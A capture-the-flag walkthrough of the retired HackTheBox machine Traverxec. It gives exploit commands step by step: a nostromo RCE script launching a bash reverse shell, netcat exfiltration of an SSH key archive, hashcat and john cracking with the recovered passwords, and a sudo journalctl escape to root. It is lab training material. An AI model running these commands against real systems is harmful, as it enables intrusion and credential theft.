HTB Walkthrough: Traverxec (retired)
Traverxec is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.
Hostname: Traverxec | Difficulty Level: Easy | Operating System: Linux
NMAP Scan
We can port 22 (ssh) and 80 (http) open.
HTTP Enumeration
From nmap results, we can see port 80 is hosting ‘nostromo 1.9.6’ rather than common webserver. Searching searchsploit for the exploit and using ‘nostromo 1.9.6 — Remote Code Execution’ exploit script.
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ searchsploit nostromo 1.9.6
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ searchsploit -m multiple/remote/47837.py
Renamed the file ‘47837.py’ to ‘rce.py’
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ python rce.py 10.10.10.165 80 “ls -lrt”
And you will see the output of ‘ls -lrt’.
Trying reverse shell now instead of listing files.
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ python rce.py 10.10.10.165 80 “bash -c ‘bash -i >& /dev/tcp/<Kali IP>/9876 0>&1’”
Open nc in another tab:
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ nc -lvnp 9876
And you will get a reverse shell of ‘www-data’ user.
The file ‘user.txt’ is present in /home/david. That means we have to escalate to ‘david’. Also, david is a server admin.
www-data@traverxec: cat nhttpd.conf
# MAIN [MANDATORY]servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
The file ‘.htpasswd’ seems interesting.
www-data@traverxec:/var/nostromo/conf$ ls -la
ls -la
total 20
drwxr-xr-x 2 root daemon 4096 Oct 27 2019 .
drwxr-xr-x 6 root root 4096 Oct 25 2019 ..
-rw-r — r — 1 root bin 41 Oct 25 2019 .htpasswd
-rw-r — r — 1 root bin 2928 Oct 25 2019 mimes
-rw-r — r — 1 root bin 498 Oct 25 2019 nhttpd.conf
www-data@traverxec:/var/nostromo/conf$ cat .htpasswd
cat .htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Above password is of form MD5Crypt digest. Trying to crack the password using hashcat.
┌──(kali㉿kali)-[~/labs/HTB/Traverxec]
└─$ echo “$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/” >> hash.txt
Command: hashcat -m 500 hash.txt -a 0 /usr/share/wordlists/rockyou.txt
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
Session……….: hashcat
Status………..: Cracked
Hash.Name……..: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target……: $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Time.Started…..: Thu Apr 8 21:12:17 2021 (20 mins, 8 secs)
Time.Estimated…: Thu Apr 8 21:32:25 2021 (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 9282 H/s (11.03ms) @ Accel:32 Loops:1000 Thr:1 Vec:8
Recovered……..: 1/1 (100.00%) Digests
Progress………: 10776448/14344385 (75.13%)
Rejected………: 0/10776448 (0.00%)
Restore.Point….: 10776320/14344385 (75.13%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:0–1000
Candidates.#1….: Nowonly4me -> November17,1994Started: Thu Apr 8 21:11:36 2021
Stopped: Thu Apr 8 21:32:26 2021
You won’t be able to ssh using above password. Let us review config file.
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# HOMEDIRS [OPTIONAL]homedirs /home
homedirs_public public_www
Google search for “nostromo homedirs public” and refer this link: https://www.gsp.com/cgi-bin/man.cgi?section=8&topic=NHTTPD . In the HOMEDIRS section, you will come to know that ‘To access a users home directory enter a ~ in the URL followed by the home directory name’.
Trying ‘http://10.10.10.165/~david/’ and you will get a web page. The above link also mentions ‘You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.’. This basically means that the directory mentioned in homedirs_public is accessible by public. You will not be able to get in ‘/home/david’ folder from shell. Let’s see the permissions on david folder.
www-data@traverxec:/home$ ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Oct 25 2019 .
drwxr-xr-x 18 root root 4096 Oct 25 2019 ..
drwx — x — x 5 david david 4096 Oct 25 2019 david
If you see the permission bits, it does not have ‘read (r)’ permission set and that means we will not be able to see (read) any contents (files) but we can execute (e.g. cd <directory>). Let us ‘cd’ into ‘public_www’.
www-data@traverxec:/home/david/public_www$ ls -la
ls -la
total 16
drwxr-xr-x 3 david david 4096 Oct 25 2019 .
drwx — x — x 5 david david 4096 Oct 25 2019 ..
-rw-r — r — 1 david david 402 Oct 25 2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25 2019 protected-file-area
Listing the contents of ‘protected-file-area’ you find a zipped file of ssh keys.
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
ls
backup-ssh-identity-files.tgz
Copying the above file to kali.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001 > backup.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$ nc 10.10.14.14 9001 < backup-ssh-identity-files.tgz
┌──(kali㉿kali)-[~/labs/HTB/Traverxec/1]
└─$ tar -xzvf backup.tgz
You will get ssh keys from backup file. SSH into traverxec with private key requires a passphrase. Extracting hash from RSA key into hash.txt
┌──(kali㉿kali)-[~/…/1/home/david/.ssh]
└─$ python3 /usr/share/john/ssh2john.py traver.ssh > hash.txt
┌──(kali㉿kali)-[~/…/1/home/david/.ssh]
└─$ sudo john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt
And the password is revealed to be hunter. SSH into traverxec using key and passphrase, you will get david shell.
┌──(kali㉿kali)-[~/…/1/home/david/.ssh]
└─$ ssh -i id_rsa david@10.10.10.165
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bashcat /home/david/bin/server-stats.head
echo “Load: `/usr/bin/uptime`”
echo “ “
echo “Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`”
echo “Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`”
echo “ “
echo “Last 5 journal log lines:”
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
Last line shows the script running ‘sudo’, hence, last line runs with root privileges. Last line basically runs journalctl on unostromo.service and the output is ‘cat’ for user to view.
Journalctl queries services and is used to view their logs. Refer this link: https://man7.org/linux/man-pages/man1/journalctl.1.html . The site mentions ‘The output is paged through less by default, and long lines are “truncated” to screen width.’ Search for ‘exploit journalctl’ and refer: https://gtfobins.github.io/gtfobins/journalctl/ . Use the ‘Shell’ method.
The exploitation is a two-part process, run the ‘journalctl’ command and then run ‘!/bin/sh’. but when you run ‘/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service’. We get complete output as your window size is large and hence, rearrange stty rows and columns.
To exploit follow below steps:
david@traverxec:~/bin$ stty rows 10 columns 50
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
!/bin/sh
And you will get root shell + flag.
